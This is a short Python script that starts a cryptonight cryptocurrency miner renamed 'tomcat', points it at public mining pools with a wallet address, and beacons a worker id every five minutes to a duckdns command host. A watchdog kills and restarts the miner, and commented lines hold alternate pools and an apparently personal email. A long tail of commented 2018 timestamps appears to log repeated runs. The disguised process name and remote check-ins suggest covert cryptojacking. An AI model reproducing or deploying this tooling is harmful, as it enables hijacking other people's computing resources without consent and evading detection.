import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:06.788410
#2018-02-17 16:01:06.904196
#2018-02-17 17:48:07.009162
#2018-02-17 19:37:04.706098
#2018-02-17 21:27:02.218818
#2018-02-17 23:11:07.413058
#2018-02-18 00:58:03.733210
#2018-02-18 02:46:04.192022
#2018-02-18 04:34:05.490030
#2018-02-18 06:25:06.915478
#2018-02-18 08:13:07.104288
#2018-02-18 10:01:04.964406
#2018-02-18 11:47:04.628323
#2018-02-18 13:32:04.559133
#2018-02-18 15:21:08.300921
#2018-02-18 17:10:08.300780
#2018-02-18 18:58:04.656244
#2018-02-18 20:44:05.911961
#2018-02-18 22:29:06.032682
#2018-02-19 00:18:04.246741
#2018-02-19 02:04:02.125538
#2018-02-19 03:50:07.019147
#2018-02-19 05:35:08.252978
#2018-02-19 07:23:05.852925
#2018-02-19 09:12:08.947612
#2018-02-19 11:02:05.977219
#2018-02-19 12:48:08.003106
#2018-02-19 14:35:09.056176
#2018-02-19 16:22:09.162122
#2018-02-19 18:09:08.050304
#2018-02-19 19:55:07.028872
#2018-02-19 21:44:07.091050
#2018-02-19 23:31:06.620606
#2018-02-20 01:17:01.618036
#2018-02-20 03:06:07.550932
#2018-02-20 04:53:01.815699
#2018-02-20 06:35:08.765067
#2018-02-20 08:20:08.812312
#2018-02-20 10:05:04.352062
#2018-02-20 11:49:11.183171
#2018-02-20 13:37:04.379924
#2018-02-20 15:20:11.529159
#2018-02-20 17:07:05.100432
#2018-02-20 18:54:10.011408
#2018-02-20 20:45:04.645452
#2018-02-20 22:31:05.416641
#2018-02-21 00:12:04.802096
#2018-02-21 01:57:03.746031
#2018-02-21 03:45:08.824461
#2018-02-21 05:38:03.438531
#2018-02-21 07:26:11.681744
#2018-02-21 09:11:07.512715
#2018-02-21 11:00:01.660927
#2018-02-21 12:46:07.163273
#2018-02-21 14:36:04.048276
#2018-02-21 16:22:01.331756
#2018-02-21 18:13:08.216229
#2018-02-21 19:58:06.835429
#2018-02-21 21:44:07.745638
#2018-02-21 23:32:06.511291
#2018-02-22 01:21:06.247834
#2018-02-22 03:10:01.588093
#2018-02-22 04:56:02.106624
#2018-02-22 06:42:01.478123
#2018-02-22 08:30:05.356718
#2018-02-22 10:17:05.340568
#2018-02-22 12:02:09.094228
#2018-02-22 13:49:01.833214
#2018-02-22 15:37:08.444062
#2018-02-22 17:24:05.278279
#2018-02-22 19:11:09.263175
#2018-02-22 21:03:05.814734
#2018-02-22 22:47:05.859099
#2018-02-23 00:36:05.757817
#2018-02-23 02:20:08.383119
#2018-02-23 04:08:05.092453
#2018-02-23 05:54:07.498439
#2018-02-23 07:44:01.727853
#2018-02-23 09:49:07.826143
#2018-02-23 11:54:03.668117
#2018-02-23 13:42:02.135597
#2018-02-23 15:29:05.868984
#2018-02-23 17:18:08.742521
#2018-02-23 19:02:05.906880
#2018-02-23 20:47:01.715515
#2018-02-23 22:33:06.292877
#2018-02-24 00:19:03.547448
#2018-02-24 02:09:05.400812
#2018-02-24 03:59:05.143010
#2018-02-24 05:44:06.240393
#2018-02-24 07:37:06.493573
#2018-02-24 09:22:05.646964
#2018-02-24 11:16:06.864734
#2018-02-24 13:05:08.435488
#2018-02-24 14:54:05.105005
#2018-02-24 16:45:08.039318
#2018-02-24 18:33:07.061486
#2018-02-24 20:20:01.501297
#2018-02-24 22:15:01.477646
#2018-02-25 01:23:06.256966
#2018-02-25 05:16:05.506408
#2018-02-25 11:15:03.889604